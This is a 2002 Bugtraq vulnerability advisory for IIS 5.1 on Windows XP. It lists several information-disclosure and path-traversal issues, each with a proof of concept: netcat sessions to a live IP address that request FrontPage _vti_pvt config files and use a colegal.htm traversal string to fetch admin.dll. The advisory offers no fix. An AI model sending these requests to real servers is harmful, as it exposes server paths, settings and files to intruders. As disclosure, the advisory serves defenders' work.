Bugtraq mailing list archives

This is the CORRECTED POST; please ignore the one before with the same subject: MULTIPLE Remote Issues with IIS 5.1 on Windows XP


From: "Adonis.No.Spam" <adonis1 () videotron ca>
Date: Sun, 10 Feb 2002 21:29:36 -0500


                             .---------------.
                            / NtWaK0 Advisory \
+---------------------------------------------------------------------------

Affected         : Windows XP with IIS 5.1
Type             : MULTIPLE Remote Issues
Type             : Remote/ Local Security Issues
Date             : 10-02-2002
Author           : NtWaK0 @ www.SafeHack.com
Credit           : NtWaK0 @ www.SafeHack.com
+---------------------------------------------------------------------------

+--------------------.
 Remote/Local Exploit \
+----------------------`----------------------------------------------------

+-----------.                                  * * * www.SafeHack.com * * *
 Disclaimer  \
+-------------`-------------------------------------------------------------

This material is presented for informational and entertainment purposes
only, and to satisfy the curious. Any activities described in this file
which involve vandalism, theft, or any other illegal activities are
recounted from third-party conversations. I do not condone or encourage
vandalism or theft. I do not accept any liability for anything anyone
does with this information. So, don't shoot the messenger.
Remember: Use a computer in ways that ensure respect for your fellows.

+-------.
 T.O.C.  \
+---------`-----------------------------------------------------------------

   [  Brief History ]
   [  The Problem   ]
   [  The Solution  ]

+-------------.
 Brief History \
+---------------`-----------------------------------------------------------
I had the chance to play for a couple of hours with IIS 5.1 on a friend's box,
thanks to Recon. While I was trying some stuff on IIS 5.1 I found many problems
with the default IIS 5.1 installation and with files installed by default.

This one is not the same as the one reported earlier. The one reported
before had to deal with "GET /_vti_bin/shtml.dll".
A copy of it can be found at:
http://www.safehack.com/Advisory/shtmldump.txt

+-------+
 Test OS
+-------+
Tested on Windows XP with IIS 5.1

Please continue to read for more details.

+-----------.
 The Problem \
+-------------`-------------------------------------------------------------

1- Issue <<<

Identify the web directory of the installation. By sending "GET /_vti_pvt/access.cnf"
you can identify the web installation path. As we all know, this is a helpful
piece of information if someone is going to attack your web site.

Proof-Of-Concept <<<
C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/access.cnf
vti_encoding:SR|utf8-nl
RealmName:LAMER
InheritPermissions:false
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt

There is another security issue with this too: "InheritPermissions:false"
tells you the security inheritance setting of that folder.
:
2- Issue <<<
Proof-Of-Concept <<<

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/botinfs.cnf

vti_encoding:SR|utf8-nl
D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\
40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar

3- Issue <<<

Proof-Of-Concept <<<
C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/bots.cnf
vti_encoding:SR|utf8-nl
vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared
\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf
vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft
\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar
\\\\fp4Avnb.dll
:
4- Issue <<<
Using GET /iishelp/common/colegal.htm you can access other files under the
web structure. I did not have a chance to test it on files above the
web structure. Like I said, I do not run IIS 5.1 but a friend does.
One of these days I am going to buy more memory for one of my old boxes and
slap IIS 5.1 on it to be able to do better tests.
:
Proof-Of-Concept <<<
C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf
vti_encoding:SR|utf8-nl
RealmName:LAMER
InheritPermissions:false
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt

writeto.cnf [Extracted From]
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp

Back links for files that can be written to by users of the web, such as
Save Results Form handler result files. Files that can be written to by
users of the web have a looser security setting than regular web content.

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll
MZ ... This program cannot be run in DOS mode.
[the rest of the returned PE binary is not reproduced here]

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/linkinfo.cnf
vti_encoding:SR|utf8-nl
javascript\:loadhelpfront();:localstart.asp
javascript\:activate(<%=iver%>);:localstart.asp
http\://www.safehack.com:index.htm
/iishelp/common/colegal.htm:localstart.asp

NOTE: A Google search for "writeto.cnf" returned alarming results:
http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta=

:
+------------.
 The Solution \
+--------------`------------------------------------------------------------
No idea. Vendor was informed.
If you are going to use the found issues, credit must be given to the
author. NtWaK0 @ www.safehack.com
+---------------------------------------------------------------------------


________________________________________________________________________
"The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good  www.SafeHack.com                         |
Je Pense, Donc Je Suis                                    \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :)    --(")--
RFCs are meant to be read and followed…:)                  /`\  NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow     -=-

